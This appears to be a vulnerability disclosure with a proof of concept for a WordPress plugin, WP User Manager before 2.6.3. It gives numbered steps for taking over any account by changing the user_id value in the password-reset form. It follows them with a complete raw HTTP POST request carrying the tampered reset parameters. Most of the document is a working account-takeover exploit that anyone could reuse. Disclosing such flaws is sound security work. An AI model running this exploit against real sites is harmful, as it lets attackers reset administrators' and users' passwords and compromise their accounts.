WP User Manager < 2.6.3 - Arbitrary User Password Reset to Account Compromise

User registration must be enabled or you must already have at least a subscriber level account.

1. Request a password reset via the reset form of the plugin and with your user email address https://example.com/password-reset/ (must be logged out).
2. Open the link in the password reset email.
3. Enter the password you wish to use twice as directed.
4. Edit the HTML of the form (not the URL) and change the user_id=1 to the user you wish to reset the password of.
eg: <form action="/password-reset/?user_id=1&amp;key= eQo7VqZ80odYpAsG3LEM&amp;step=reset"...
5. Submit the form and you will have reset the password that user ID, you can then login as them using the password you just set.


POST /password-reset/?user_id=1&key=eQo7VqZ80odYpAsG3LEM&step=reset HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------379058955437385512824083418510
Content-Length: 837
Connection: close
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1

-----------------------------379058955437385512824083418510
Content-Disposition: form-data; name="password"

[email protected]
-----------------------------379058955437385512824083418510
Content-Disposition: form-data; name="password_2"

[email protected]
-----------------------------379058955437385512824083418510
Content-Disposition: form-data; name="wpum_form"

password-recovery
-----------------------------379058955437385512824083418510
Content-Disposition: form-data; name="step"

2
-----------------------------379058955437385512824083418510
Content-Disposition: form-data; name="password_recovery_nonce"

77fd98177c
-----------------------------379058955437385512824083418510
Content-Disposition: form-data; name="submit_password_recovery"

Reset password
-----------------------------379058955437385512824083418510--